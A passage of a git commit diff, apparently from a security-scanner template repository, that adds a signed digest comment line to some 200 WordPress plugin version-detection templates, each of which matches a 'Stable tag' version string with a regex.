http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + network/enumeration/beanstalk-service.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..31dac33e8e 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005ec4957081d3616091df87b63ef3316eee10ea6944ffe8512357b3b227b49a4022030ca82f2d399674351c0070d69c5cc2ab3297c39ced1e1745d22982ccf27e587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..8c77ce6f5b 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220138c852e2ef9d9789f5260c7e129955d597b69dbc438af518a3b726bf4658dd402202422f24376d7dbf06d8baf1cf02e9f7446e36620b3c5970aad800a1c5fc9928f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..4ed60f57b9 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bdaa18a62e72073d76093369131ccb32fc19ef777d2edc83ff886bbc3cf9365e0220426bbd54091baee627ae7eebbc83bf9e2ea0d10b000ed7e5895e927a2873c3ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..564417d156 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220657e95868d71234a2138185c03b7de2ca60f6aaacf1a569e329070521cef6f83022100ec4c4ce88084787524cfd62cc77056907c64cb83bffdd22932aa3b42439cab54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..80e2eb8463 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205378b52cdab37579ff27892a234c5bf4311a751a8e0cc7786be075e2d49f97c202204e95fbe746e4e38376c369f856eba4cf751f9d258381c6bf83768dfcbd624396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..804d27d14a 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205979aeb51f3f0ecb2a57ca3e3954c8e935719e94f52bef67073207b73cc1af21022100bbe5eaf1e02f67b19c1c65e22aa60434e015439f2df6731f5c0883470b14fd74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..ab9b93db51 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204aeb8edb23f9d884e49723c2c12a2e382b0a9ee91bd6fa3f174438a94cd166b80221008433d667cbe70756019d3ccee1de310496bd09f5c176641efc8fa2690161da58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..1f62778a08 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9a45e9259b1c1c90b877674fb76552ab489db868ff4896d9403781418fe5b31022100ab5463b0dcf7b8917db496e1bd6ae6528971d225b87b583efe3b5c13ff6656e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..015f040bd1 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200db7662786b45216df640d83f7607b0eff7c3f87451d082ac5ee6a86f1e9681b02201e705960478a606a9d49bff801220d59366ccc492013541102f28ea558a503ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..5d17e02c09 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009fda733658b143cc0b9423c62507d73d359089d1d05e0a4f69bb371e99f109b9022100a6782b224afe461c3e5c0e0050f361fddeecddd3b2ef98bc32e0c0eb6397901d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..f240ad73f4 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210081fd580a03209f9702cdf2777bfccaaa1cca429cb813789e0dd9026fcf3a9b50022046ad4afc9bcce1d9dcf254a2a8ed49ce2e68138820f962f5ad1e0dda71e8ac6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..663dc481da 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066034e700a7544c53b095c28edac79f025c260e7445f91f0db0a23bac6847f21022100caf9ec6bfb809dfd8753be6496cd45c69a64c7cc821a4fb835469cbe71e30658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..1a9acb6688 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022065a6caee86cfca0221f759ad7e8636c452ee037d726aec1c499a82b29cda1603022034229ca6c489efe5e7a7dc89fcf71f0c189472c13cb35240a1edcfbf7f71abd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..4fb04890c0 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009352404f0224eeb5213fa7bdb545ae1abdc9bf6509648a1356a51647826ac6ef02201d9dbbacf0f5e5981495a004be10770fcd51bc3d7f3a38c70f04e00621662fdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..1191f33435 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220591ed476e51d21a298f4da5a05f68c69afda3769829b1124dc8efbf7fd468037022100b90c2db13b556eed1d4a9bcb481e75121dc7baeb9bfbde968f1cb52fd6406853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..50b28a07a7 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205ffcbcbc23df3dd0cf0cbbe65d55b25797c68a9de2c2e02c0d4e582ee184508c02205f51e32562696722cbb0e11cc2d925d6199dbe04c94eaa2e6e4ab7681c9e4473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..b68f3c6b1b 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073acfe30f6aead1fcc6222b40368b70be776ebc762b969373f825da301554b9f02207258935e42e694131218ff248fda35277ba2467c3370daa0e05110a340e9a7ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..d6918c5182 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c83feb4d8f873e1f7cf95fdfe5e39fb6b67b50e40cf9dff594194f5ab4974b290220767018ecd911d25413c56b53939491af618c4873de61b4e073917f8e33b97059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..e24587c0ef 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c2654e240bcaeeae276ad15ff615531bca46cd1ea4d54d399d321be440e9451022071730a809e57cbbffff49ce933bf00f16b72e9c134c2e792e35dc38968d27a13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..28e0101474 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024e2694c5a1a66cbd896c705f1dc26b8cd7f03cbea605ba774a23e9f84804f63022100be5ffbaf499ee6cb1007c52b1f4b73a4c337d02b9c0a56d44b8cc90bb4cfd9c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..d449df85c5 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022041de198160acc8c042594c03433d4866eb3a92375a5984515e554d8928bea60802207f01c478175a8bec523b7ab58107a12f3a33f76e77601d65ef991fe1fa65ddd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..f091a96f21 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008a02b896695fbef840656df2d64782b3a7d2137378183412a72598edc8dbb39702205b651f7493bd36452784e31462ac0e7d52427d153211408a9f0b0844ab2b8136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..b905568aef 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220182c2b94b7533144e44e74e49ee81b207917dc2c1b9674efdb4546deb263c7df022100cdaf556009ef7f8fdfa2cd8431cd1131e504e3c391197c15b58a5ac9a2bd566d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..94e55e32ec 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e24448fc2affca3e1c4e82efdbccf4830d6a6501d3b4562e0f8bfbf892007a3e022058eaa66181af348d197c5f01f27accc4b216c71a0335ba2075b9c628faa6a432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..ac49e20d3b 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe96d5e8d78514327251368765a693d4c7244d25fd7b0705c7387a972749c23d022100840269efc452859647dd6cac29981ba4976340424a3055836dc4463315a38386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..d16d1bab1c 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100981c7a2133d9cf5685212331163c3c52f70d661bc9c276cef5fff38c89eec2610220719fab0b113caf09ecc526968237a1a92edc6a29cb9dc26f8ec5311adcdb53cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..54e7897ca4 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220290036bba831f55ac356701066ddef6ea76c5a0fc5d8212c07e9fb09c621212802202e9f1ace31502d7e6f7acbef9123d7e8b91dd0cd0e2bd54fdf37b7d7573621ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..8979f6097a 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035686b9cbc0d9779d38a1ae6e6f70b763b76194d5ba4899d1c3c39cec3c9657702206b4bd980d112989f5baf3536936c974694b661b4282a947e7892119b0e86ed1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..6223e2b1dc 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201cbb034f65e784e6151ce2cb60996d62d482b5493808856e117d73482e9448cd02204f6d37996f827bdaa8b8a825f76cd4f39d52b42ad3851b1d5f89145454940cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..f264f463b5 100644 --- 